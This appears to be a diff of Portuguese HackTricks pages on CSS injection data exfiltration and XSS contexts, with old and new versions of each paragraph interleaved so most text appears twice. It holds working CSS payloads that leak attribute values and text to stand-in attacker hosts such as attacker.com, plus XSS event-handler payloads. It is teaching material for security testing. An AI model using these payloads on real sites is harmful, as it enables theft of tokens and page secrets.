Como [**explicado neste post**](https://portswigger.net/research/blind-css-exfiltration), é possível combinar os seletores **`:has`** e **`:not`** para identificar conteúdo mesmo de elementos cegos. Isso é muito útil quando você não tem ideia do que está dentro da página da web carregando a injeção de CSS.\
Também é possível usar esses seletores para extrair informações de vários blocos do mesmo tipo, como em:
Como [**explicado neste post**](https://portswigger.net/research/blind-css-exfiltration), é possível combinar os seletores **`:has`** e **`:not`** para identificar conteúdo mesmo de elementos cegos. Isso é muito útil quando você não tem ideia do que está dentro da página web carregando a injeção de CSS.\
Também é possível usar esses seletores para extrair informações de vários blocos do mesmo tipo como em:
```html
<style>
html:has(input[name^="m"]):not(input[name="mytoken"]) {
@ -57,34 +59,34 @@ background:url(/m);
<input name=mytoken value=1337>
<input name=myname value=gareth>
```
Combinando isso com a seguinte técnica **@import**, é possível extrair muitas informações usando injeção de CSS em páginas cegas com [**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**.**
Combinando isso com a seguinte técnica **@import**, é possível exfiltrar muitas **informações usando injeção de CSS em páginas cegas com** [**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**.**
### @import
A técnica anterior tem algumas desvantagens, verifique os pré-requisitos. Você precisa ser capaz de **enviar vários links para a vítima**, ou precisa ser capaz de **incluir a página vulnerável à injeção de CSS em um iframe**.
A técnica anterior tem algumas desvantagens, verifique os pré-requisitos. Você precisa ser capaz de **enviar múltiplos links para a vítima**, ou precisa ser capaz de **iframe a página vulnerável à injeção de CSS**.
No entanto, existe outra técnica inteligente que usa **CSS `@import`** para melhorar a qualidade da técnica.
Isso foi mostrado pela primeira vez por [**Pepe Vila**](https://vwzq.net/slides/2019-s3\_css\_injection\_attacks.pdf) e funciona da seguinte maneira:
Isso foi mostrado pela primeira vez por [**Pepe Vila**](https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf) e funciona assim:
Em vez de carregar a mesma página várias vezes com dezenas de payloads diferentes a cada vez (como na técnica anterior), vamos **carregar a página apenas uma vez e apenas com uma importação para o servidor do atacante** (este é o payload a ser enviado para a vítima):
Em vez de carregar a mesma página várias vezes com dezenas de payloads diferentes cada vez (como na técnica anterior), vamos **carregar a página apenas uma vez e apenas com um import para o servidor do atacante** (este é o payload para enviar à vítima):
```css
@import url('//attacker.com:5001/start?');
```
1. A importação vai **receber um script CSS** dos atacantes e o **navegador irá carregá-lo**.
2. A primeira parte do script CSS que o atacante enviará é **outro `@import` para o servidor dos atacantes novamente**.
1. O servidor dos atacantes não responderá a essa solicitação ainda, pois queremos vazar alguns caracteres e depois responder a essa importação com a carga útil para vazar os próximos.
3. A segunda e maior parte da carga útil será um **vazamento de seletor de atributo**.
1. Isso enviará para o servidor dos atacantes o **primeiro caractere do segredo e o último**.
4. Assim que o servidor dos atacantes receber o **primeiro e último caractere do segredo**, ele **responderá à importação solicitada no passo 2**.
1. A resposta será exatamente a mesma dos **passos 2, 3 e 4**, mas desta vez tentará **encontrar o segundo caractere do segredo e depois o penúltimo**.
1. A importação vai **receber algum script CSS** dos atacantes e o **navegador irá carregá-lo**.
2. A primeira parte do script CSS que o atacante enviará é **outro `@import` para o servidor do atacante novamente.**
3. O servidor do atacante não responderá a esta solicitação ainda, pois queremos vazar alguns caracteres e depois responder a esta importação com o payload para vazar os próximos.
4. A segunda e maior parte do payload será um **payload de vazamento de seletor de atributo**
5. Isso enviará ao servidor do atacante o **primeiro caractere do segredo e o último**
6. Uma vez que o servidor do atacante tenha recebido o **primeiro e último caractere do segredo**, ele **responderá a importação solicitada na etapa 2**.
7. A resposta será exatamente a mesma que as **etapas 2, 3 e 4**, mas desta vez tentará **encontrar o segundo caractere do segredo e então o penúltimo**.
O atacante **seguirá esse loop até conseguir vazar completamente o segredo**.
O atacante **continuará esse loop até conseguir vazar completamente o segredo**.
Você pode encontrar o [**código original de Pepe Vila para explorar isso aqui**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231) ou você pode encontrar quase o [**mesmo código, mas comentado aqui**](./#css-injection).
Você pode encontrar o [**código original de Pepe Vila para explorar isso aqui**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231) ou pode encontrar quase o [**mesmo código, mas comentado aqui**.](./#css-injection)
{% hint style="info" %}
O script tentará descobrir 2 caracteres de cada vez (do início e do final) porque o seletor de atributo permite fazer coisas como:
O script tentará descobrir 2 caracteres cada vez (do início e do fim) porque o seletor de atributo permite fazer coisas como:
```css
/* value^= to match the beggining of the value*/
input[value^="0"]{--s0:url(http://localhost:5001/leak?pre=0)}
@ -96,26 +98,26 @@ Isso permite que o script vaze o segredo mais rapidamente.
{% endhint %}
{% hint style="warning" %}
Às vezes, o script **não detecta corretamente que o prefixo + sufixo descoberto já é a bandeira completa** e ele continuará avançando (no prefixo) e retrocedendo (no sufixo) e, em algum momento, ele ficará travado.\
Não se preocupe, apenas verifique a **saída** porque **você pode ver a bandeira lá**.
Às vezes, o script **não detecta corretamente que o prefixo + sufixo descoberto já é a flag completa** e continuará avançando (no prefixo) e retrocedendo (no sufixo) e, em algum momento, travará.\
Não se preocupe, apenas verifique o **output** porque **você pode ver a flag lá**.
{% endhint %}
### Outros seletores
Outras maneiras de acessar partes do DOM com **seletores CSS**:
Outras formas de acessar partes do DOM com **seletores CSS**:
* **`.class-to-search:nth-child(2)`**: Isso irá procurar o segundo item com a classe "class-to-search" no DOM.
* Seletor **`:empty`**: Usado, por exemplo, neste [**writeup**](https://github.com/b14d35/CTF-Writeups/tree/master/bi0sCTF%202022/Emo-Locker)**:**
* **`.class-to-search:nth-child(2)`**: Isso procurará o segundo item com a classe "class-to-search" no DOM.
* **`:empty`** seletor: Usado por exemplo em [**este writeup**](https://github.com/b14d35/CTF-Writeups/tree/master/bi0sCTF%202022/Emo-Locker)**:**
```css
[role^="img"][aria-label="1"]:empty { background-image: url("YOUR_SERVER_URL?1"); }
```
### XS-Search baseado em erros
### XS-Search baseado em erro
**Referência:** [Ataque baseado em CSS: Abusando do unicode-range de @font-face](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html), [PoC de XS-Search baseado em erros por @terjanq](https://twitter.com/terjanq/status/1180477124861407234)
**Referência:** [Ataque baseado em CSS: Abusando do unicode-range de @font-face ](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html), [Error-Based XS-Search PoC por @terjanq](https://twitter.com/terjanq/status/1180477124861407234)
Basicamente, a ideia principal é **usar uma fonte personalizada de um endpoint controlado por nós** em um **texto que será exibido apenas se o recurso não puder ser carregado**.
Basicamente, a ideia principal é **usar uma fonte personalizada de um endpoint controlado por nós** em um **texto que será mostrado apenas se o recurso não puder ser carregado**.
```html
<!DOCTYPE html>
<html>
@ -139,15 +141,15 @@ font-family: 'poc';
</body>
</html>
```
### Estilizando Fragmento de Rolagem-para-Texto
### Estilizando Fragmento de Rolagem para Texto
Quando um **fragmento de URL direciona para um elemento**, a pseudo-classe [**`:target`**](https://drafts.csswg.org/selectors-4/#the-target-pseudo) **pode ser usada** para selecioná-lo, mas **`::target-text` não corresponde a nada**. Ele só corresponde ao texto que é direcionado pelo \[fragmento].
Quando um **fragmento de URL tem como alvo um elemento**, a pseudo-classe [**`:target`**](https://drafts.csswg.org/selectors-4/#the-target-pseudo) **pode ser usada** para selecioná-lo, mas **`::target-text` não corresponde a nada**. Ela só corresponde a texto que é diretamente alvo do \[fragmento].
Portanto, um atacante poderia usar o fragmento de **Rolagem-para-Texto** e se **algo for encontrado** com esse texto, podemos **carregar um recurso** (por meio de **injeção de HTML**) do servidor do atacante para indicá-lo:
Portanto, um atacante poderia usar o fragmento **Scroll-to-text** e, se **algo for encontrado** com esse texto, podemos **carregar um recurso** (via **injeção de HTML**) do servidor do atacante para indicar isso:
```css
:target::before { content : url(target.png) }
```
Um exemplo desse ataque poderia ser:
Um exemplo deste ataque poderia ser:
{% code overflow="wrap" %}
```
@ -155,7 +157,7 @@ http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:
```
{% endcode %}
O que está sendo abusado é uma **injeção HTML enviando o código**:
O que consiste em abusar de uma **injeção de HTML enviando o código**:
{% code overflow="wrap" %}
```css
@ -163,24 +165,24 @@ O que está sendo abusado é uma **injeção HTML enviando o código**:
```
{% endcode %}
com o fragmento scroll-to-text: **`#:~:text=Administrador`**
com o fragmento de rolagem para texto: **`#:~:text=Administrator`**
Se a palavra Administrador for encontrada, o recurso indicado será carregado.
Se a palavra Administrator for encontrada, o recurso indicado será carregado.
Existem três principais mitigadores:
Existem três principais mitigações:
1. **STTF só pode corresponder a palavras ou frases em uma página da web**, teoricamente tornando impossível vazar segredos ou tokens aleatórios (a menos que dividamos o segredo em parágrafos de uma letra).
2. É **restrito a contextos de navegação de alto nível**, portanto, não funcionará em um iframe, tornando o ataque **visível para a vítima**.
3. **É necessário um gesto de ativação do usuário para que o STTF funcione**, portanto, apenas navegações que são resultado de ações do usuário são exploráveis, o que diminui muito a possibilidade de automatizar o ataque sem interação do usuário. No entanto, existem certas condições que o autor da postagem do blog acima descobriu que facilitam a automação do ataque. Outro caso semelhante será apresentado em PoC#3.
1. Existem algumas **burlas** para isso, como **engenharia social**, ou **forçar extensões comuns do navegador a interagir**.
1. **STTF só pode corresponder a palavras ou frases em uma página da web**, teoricamente tornando impossível o vazamento de segredos ou tokens aleatórios (a menos que decomponhamos o segredo em parágrafos de uma letra).
2. É **restrito a contextos de navegação de nível superior**, então não funcionará em um iframe, tornando o ataque **visível para a vítima**.
3. **É necessário um gesto de ativação do usuário para que o STTF funcione**, então apenas navegações que são resultado de ações do usuário são exploráveis, o que diminui bastante a possibilidade de automatizar o ataque sem interação do usuário. No entanto, existem certas condições que o autor do post do blog acima descobriu que facilitam a automação do ataque. Outro caso semelhante será apresentado no PoC#3.
1. Existem alguns **bypasses** para isso, como **engenharia social**, ou **forçar extensões comuns de navegador a interagir**.
Para mais informações, consulte o relatório original: [https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/](https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/)
Para mais informações, confira o relatório original: [https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/](https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/)
Você pode verificar um [**exploit usando essa técnica para um CTF aqui**](https://gist.github.com/haqpl/52455c8ddfec33aeefb468301d70b6eb).
Você pode verificar um [**exploit usando esta técnica para um CTF aqui**](https://gist.github.com/haqpl/52455c8ddfec33aeefb468301d70b6eb).
### @font-face / unicode-range <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>
Você pode especificar **fontes externas para valores unicode específicos** que só serão **coletados se esses valores unicode estiverem presentes** na página. Por exemplo:
Você pode especificar **fontes externas para valores unicode específicos** que só serão **coletadas se esses valores unicode estiverem presentes** na página. Por exemplo:
```html
<style>
@font-face{
@ -205,39 +207,39 @@ font-family:poc;
<p id="sensitive-information">AB</p>htm
```
Quando você acessa esta página, o Chrome e o Firefox buscam "?A" e "?B" porque o nó de texto de informações sensíveis contém os caracteres "A" e "B". Mas o Chrome e o Firefox não buscam "?C" porque não contém "C". Isso significa que conseguimos ler "A" e "B".
Ao acessar esta página, Chrome e Firefox buscam "?A" e "?B" porque o nó de texto de informações sensíveis contém os caracteres "A" e "B". No entanto, Chrome e Firefox não buscam "?C" porque não contém "C". Isso significa que conseguimos ler "A" e "B".
### Exfiltração de nó de texto (I): ligaduras <a href="#exfiltração-de-nó-de-texto-i-ligaduras" id="exfiltração-de-nó-de-texto-i-ligaduras"></a>
### Exfiltração de nó de texto (I): ligaduras <a href="#text-node-exfiltration-i-ligaduras" id="text-node-exfiltration-i-ligaduras"></a>
**Referência:** [Wykradanie danych w świetnym stylu czyli jak wykorzystać CSS-y do ataków na webaplikację](https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/)
Podemos extrair o texto contido em um nó com uma técnica que combina **ligaduras de fonte** e a **detecção de mudanças de largura**. A ideia principal por trás dessa técnica é a criação de fontes que contenham uma ligadura predefinida com **tamanho grande** e o uso de **mudanças de tamanho como oráculo**.
Podemos extrair o texto contido em um nó com uma técnica que combina **ligaduras de fonte** e a **detecção de mudanças de largura**. A ideia principal por trás dessa técnica é a criação de fontes que contêm uma ligadura predefinida com **tamanho grande** e o uso de **mudanças de tamanho como oráculo**.
As fontes podem ser criadas como fontes SVG e depois convertidas para woff com o fontforge. No SVG, podemos definir a largura de um glifo por meio do atributo **horiz-adv-x**, então podemos construir algo como `<glyph unicode="XY" horiz-adv-x="8000" d="M1 0z"/>`, sendo **XY uma sequência de dois caracteres**. **Se a sequência existir, ela será renderizada e o tamanho do texto mudará**. Mas... como podemos detectar essas mudanças?
As fontes podem ser criadas como fontes SVG e depois convertidas para woff com o fontforge. Em SVG, podemos definir a largura de um glifo através do atributo **horiz-adv-x**, então podemos construir algo como `<glyph unicode="XY" horiz-adv-x="8000" d="M1 0z"/>`, sendo **XY uma sequência de dois caracteres**. **Se a sequência existir, ela será renderizada e o tamanho do texto mudará**. Mas... como podemos detectar essas mudanças?
Quando o atributo white-space é definido como **nowrap**, ele força o texto a não quebrar quando excede a largura do pai. Nessa situação, uma **barra de rolagem horizontal aparecerá**. E podemos **definir o estilo dessa barra de rolagem**, então podemos vazar quando isso acontecer **:)**.
Quando o atributo white-space é definido como **nowrap**, ele força o texto a não quebrar quando excede a largura do elemento pai. Nessa situação, uma **barra de rolagem horizontal aparecerá**. E podemos **definir o estilo dessa barra de rolagem**, então podemos detectar quando isso acontece **:)**
```css
body { white-space: nowrap };
body::-webkit-scrollbar { background: blue; }
body::-webkit-scrollbar:horizontal { background: url(http://ourendpoint.com/?leak); }
```
Neste ponto, o ataque está claro:
Neste ponto, o ataque é claro:
1. Criar **fontes** para a combinação de **dois caracteres com largura enorme**
2. Detectar o **vazamento através do truque da barra de rolagem**
3. Usando a primeira ligadura vazada como base, criar **novas combinações de 3 caracteres** (adicionando caracteres antes / depois)
2. Detectar o **vazamento pelo truque da barra de rolagem**
3. Usando a primeira ligadura vazada como base, criar **novas combinações de 3 caracteres** (adicionando caracteres antes/depois)
4. **Detectar** a **ligadura de 3 caracteres**.
5. Repetir até **vazar todo o texto**
5. Repetir até **vazar o texto inteiro**
Ainda precisamos de um método aprimorado para iniciar a iteração, porque `<meta refresh=...` é subótimo. Você pode usar o **truque do CSS @import para otimizar a exploração**.
Ainda precisamos de um método melhorado para iniciar a iteração porque `<meta refresh=...` é subótimo. Você poderia usar o **truque CSS @import para otimizar o exploit**.
### Exfiltração de nó de texto (II): vazando o conjunto de caracteres com uma fonte padrão (não requer ativos externos) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
### Exfiltração de nó de texto (II): vazando o conjunto de caracteres com uma fonte padrão (sem necessidade de ativos externos) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
**Referência:** [PoC usando Comic Sans por @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html)
Este truque foi lançado neste [**tópico do Slackers**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what\_can\_we\_do\_with\_single\_css\_injection/). O conjunto de caracteres usado em um nó de texto pode ser vazado **usando as fontes padrão** instaladas no navegador: não são necessárias fontes externas ou personalizadas.
Este truque foi divulgado nesta [**thread do Slackers**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what\_can\_we\_do\_with\_single\_css\_injection/). O conjunto de caracteres usado em um nó de texto pode ser vazado **usando as fontes padrão** instaladas no navegador: não são necessárias fontes externas ou personalizadas.
A chave é usar uma animação para **aumentar a largura da div de 0 até o final do texto**, o tamanho de um caractere a cada vez. Fazendo isso, podemos "dividir" o texto em duas partes: um "prefixo" (a primeira linha) e um "sufixo", então toda vez que a div aumenta sua largura, um novo caractere se move do "sufixo" para o "prefixo". Algo como:
A chave é usar uma animação para **aumentar a largura do div de 0 até o final do texto**, o tamanho de um caractere de cada vez. Fazendo isso, podemos "dividir" o texto em duas partes: um "prefixo" (a primeira linha) e um "sufixo", então toda vez que o div aumenta sua largura, um novo caractere se move do "sufixo" para o "prefixo". Algo como:
**C**\
ADB
@ -250,14 +252,14 @@ B
**CADB**
Quando um novo caractere vai para a primeira linha, o **truque unicode-range é usado para detectar o novo caractere no prefixo**. Essa detecção é feita alterando a fonte para Comic Sans, cuja altura é superior, então uma **barra de rolagem vertical é acionada** (vazando o valor do caractere). Dessa forma, podemos vazar cada caractere diferente uma vez. **Podemos detectar se um caractere é repetido, mas não qual caractere é repetido**.
Quando um novo caractere vai para a primeira linha, **o truque do unicode-range é usado para detectar o novo caractere no prefixo**. Essa detecção é feita mudando a fonte para Comic Sans, cuja altura é superior, então uma **barra de rolagem vertical é acionada** (vazando o valor do caractere). Desta forma, podemos vazar cada caractere diferente uma vez. **Podemos detectar se um caractere é repetido, mas não qual caractere é repetido**.
{% hint style="info" %}
Basicamente, o **unicode-range é usado para detectar um caractere**, mas como não queremos carregar uma fonte externa, precisamos encontrar outra maneira.\
Quando o **caractere** é **encontrado**, é **atribuída** a fonte **Comic Sans pré-instalada**, que a **torna maior** e **aciona uma barra de rolagem** que irá **vazar o caractere encontrado**.
Quando o **caractere** é **encontrado**, ele é **atribuído** à fonte **Comic Sans pré-instalada**, o que **aumenta** o tamanho do caractere e **aciona uma barra de rolagem** que irá **vazar o caractere encontrado**.
{% endhint %}
Verifique o código extraído do PoC:
Confira o código extraído do PoC:
```css
/* comic sans is high (lol) and causes a vertical overflow */
@font-face{font-family:has_A;src:local('Comic Sans MS');unicode-range:U+41;font-style:monospace;}
@ -360,7 +362,7 @@ text-transform: uppercase; /* only capital letters leak */
96% { font-family: rest; }
}
/* aumentar a largura caractere por caractere, ou seja, adicionar novo caractere ao prefixo */
/* increase width char by char, i.e. add new char to prefix */
@keyframes loop {
0% { width: 0px }
1% { width: 20px }
@ -377,20 +379,20 @@ div::-webkit-scrollbar {
background: blue;
}
/* canal lateral */
/* side-channel */
div::-webkit-scrollbar:vertical {
background: blue var(--leak);
}
```
### Exfiltração de nó de texto (III): vazando o conjunto de caracteres com uma fonte padrão ocultando elementos (não requerendo ativos externos) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
### Exfiltração de nó de texto (III): vazando o conjunto de caracteres com uma fonte padrão ao ocultar elementos (não requer ativos externos) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
**Referência:** Isso é mencionado como [uma solução malsucedida neste artigo](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
**Referência:** Isso é mencionado como [uma solução sem sucesso neste writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
Este caso é muito semelhante ao anterior, no entanto, neste caso, o objetivo de tornar caracteres específicos maiores do que outros é ocultar algo, como um botão para não ser pressionado pelo bot ou uma imagem que não será carregada. Assim, poderíamos medir a ação (ou a falta de ação) e saber se um caractere específico está presente no texto.
Este caso é muito semelhante ao anterior, no entanto, neste caso o objetivo de fazer com que caracteres específicos **sejam maiores que outros é para ocultar algo** como um botão para não ser pressionado pelo bot ou uma imagem que não será carregada. Assim, poderíamos medir a ação (ou falta dela) e saber se um caractere específico está presente no texto.
### Exfiltração de nó de texto (III): vazando o conjunto de caracteres por meio do tempo de cache (não requerendo ativos externos) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
### Exfiltração de nó de texto (III): vazando o conjunto de caracteres pelo tempo de cache (não requer ativos externos) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
**Referência:** Isso é mencionado como [uma solução malsucedida neste artigo](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
**Referência:** Isso é mencionado como [uma solução sem sucesso neste writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
Neste caso, poderíamos tentar vazar se um caractere está no texto carregando uma fonte falsa da mesma origem:
```css
@ -400,15 +402,15 @@ src: url(/static/bootstrap.min.css?q=1);
unicode-range: U+0041;
}
```
Se houver uma correspondência, a **fonte será carregada de `/static/bootstrap.min.css?q=1`**. Embora não seja carregada com sucesso, o **navegador deve armazená-la em cache**, e mesmo que não haja cache, um mecanismo de **304 não modificado**, então a **resposta deve ser mais rápida** do que outras coisas.
Se houver correspondência, a **fonte será carregada de `/static/bootstrap.min.css?q=1`**. Embora não seja carregada com sucesso, o **navegador deve armazená-la em cache**, e mesmo que não haja cache, existe um mecanismo de **304 não modificado**, então a **resposta deve ser mais rápida** do que outras coisas.
No entanto, se a diferença de tempo entre a resposta em cache e a não em cache não for grande o suficiente, isso não será útil. Por exemplo, o autor mencionou: No entanto, após testar, descobri que o primeiro problema é que a velocidade não é muito diferente, e o segundo problema é que o bot usa a flag `disk-cache-size=1`, o que é realmente cuidadoso.
No entanto, se a diferença de tempo da resposta em cache e da não em cache não for grande o suficiente, isso não será útil. Por exemplo, o autor mencionou: No entanto, após testar, descobri que o primeiro problema é que a velocidade não é muito diferente, e o segundo problema é que o bot usa a flag `disk-cache-size=1`, o que é realmente pensado.
### Exfiltração de nó de texto (III): vazando o conjunto de caracteres através da medição do tempo de carregamento de centenas de "fontes" locais (não requer ativos externos) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
### Exfiltração de nó de texto (III): vazando o conjunto de caracteres pelo tempo de carregamento de centenas de "fontes" locais (não requerendo ativos externos) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
**Referência:** Isso é mencionado como [uma solução mal sucedida neste artigo](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
**Referência:** Isso é mencionado como [uma solução sem sucesso neste writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
Nesse caso, você pode indicar ao **CSS para carregar centenas de fontes falsas** da mesma origem quando ocorrer uma correspondência. Dessa forma, você pode **medir o tempo** que leva e descobrir se um caractere aparece ou não com algo como:
Neste caso, você pode indicar ao **CSS para carregar centenas de fontes falsas** da mesma origem quando ocorrer uma correspondência. Dessa forma, você pode **medir o tempo** que leva e descobrir se um caractere aparece ou não com algo como:
```css
@font-face {
font-family: "A1";
@ -419,13 +421,14 @@ url(/static/bootstrap.min.css?q=500);
unicode-range: U+0041;
}
```
E o código do bot se parece com isso:
E o código do bot é assim:
```python
browser.get(url)
WebDriverWait(browser, 30).until(lambda r: r.execute_script('return document.readyState') == 'complete')
time.sleep(30)
```
Assumindo que a fonte não corresponda, o tempo para obter a resposta ao visitar o bot deve ser de cerca de 30 segundos. Se houver correspondência, uma série de solicitações será enviada para obter a fonte, e a rede sempre terá algo, então levará mais tempo para atender à condição de parada e obter a resposta. Portanto, o tempo de resposta pode indicar se há uma correspondência.
```markdown
Portanto, assumindo que a fonte não corresponde, o tempo para obter a resposta ao visitar o bot deve ser de cerca de 30 segundos. Se houver uma correspondência, uma série de solicitações será enviada para obter a fonte, e a rede sempre terá algo, portanto, levará mais tempo para atender à condição de parada e obter a resposta. Assim, o tempo de resposta pode indicar se há uma correspondência.
## Referências
@ -436,12 +439,15 @@ Assumindo que a fonte não corresponda, o tempo para obter a resposta ao visitar
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
```

84
pentesting-web/xss-cross-site-scripting/README.md
View file

@ -2,7 +2,7 @@
/<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">
**Dica de bug bounty**: **inscreva-se** no **Intigriti**, uma plataforma premium de **bug bounty criada por hackers, para hackers**! Junte-se a nós em [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoje e comece a ganhar recompensas de até **$100,000**!
**Dica de recompensa por bugs**: **inscreva-se** no **Intigriti**, uma plataforma premium de recompensa por bugs criada por hackers, para hackers! Junte-se a nós em [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoje, e comece a ganhar recompensas de até **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -43,15 +43,15 @@ Ao trabalhar em um XSS complexo, você pode achar interessante saber sobre:
Para explorar com sucesso um XSS, a primeira coisa que você precisa encontrar é um **valor controlado por você que está sendo refletido** na página web.
* **Refletido imediatamente**: Se você descobrir que o valor de um parâmetro ou até mesmo o caminho está sendo refletido na página web, você poderia explorar um **Reflected XSS**.
* **Armazenado e refletido**: Se você descobrir que um valor controlado por você é salvo no servidor e refletido toda vez que você acessa uma página, você poderia explorar um **Stored XSS**.
* **Refletido imediatamente**: Se você descobrir que o valor de um parâmetro ou até mesmo o caminho está sendo refletido na página web, você poderia explorar um **XSS Refletido**.
* **Armazenado e refletido**: Se você descobrir que um valor controlado por você é salvo no servidor e refletido toda vez que você acessa uma página, você poderia explorar um **XSS Armazenado**.
* **Acessado via JS**: Se você descobrir que um valor controlado por você está sendo acessado usando JS, você poderia explorar um **DOM XSS**.
## Contextos
Ao tentar explorar um XSS, a primeira coisa que você precisa saber é **onde sua entrada está sendo refletida**. Dependendo do contexto, você poderá executar código JS arbitrário de diferentes maneiras.
### HTML puro
### HTML Puro
Se sua entrada é **refletida no HTML puro** da página, você precisará abusar de alguma **tag HTML** para executar código JS: `<img , <iframe , <svg , <script` ... estas são apenas algumas das muitas possíveis tags HTML que você poderia usar.\
Além disso, lembre-se da [Injeção de Template do Lado do Cliente](../client-side-template-injection-csti.md).
@ -62,15 +62,15 @@ Se sua entrada é refletida dentro do valor do atributo de uma tag, você poderi
1. **Escapar do atributo e da tag** (então você estará no HTML puro) e criar uma nova tag HTML para abusar: `"><img [...]`
2. Se você **pode escapar do atributo, mas não da tag** (`>` é codificado ou excluído), dependendo da tag, você poderia **criar um evento** que executa código JS: `" autofocus onfocus=alert(1) x="`
3. Se você **não pode escapar do atributo** (`"` é codificado ou excluído), então dependendo de **qual atributo** sua entrada está sendo refletida e **se você controla todo o valor ou apenas uma parte**, você poderá abusá-lo. Por **exemplo**, se você controla um evento como `onclick=`, você poderá fazê-lo executar código arbitrário quando for clicado. Outro **exemplo** interessante é o atributo `href`, onde você pode usar o protocolo `javascript:` para executar código arbitrário: **`href="javascript:alert(1)"`**
4. Se sua entrada é refletida dentro de **tags não exploráveis**, você poderia tentar o truque do **`accesskey`** para abusar da vulnerabilidade (você precisará de algum tipo de engenharia social para explorar isso): **`" accesskey="x" onclick="alert(1)" x="`**
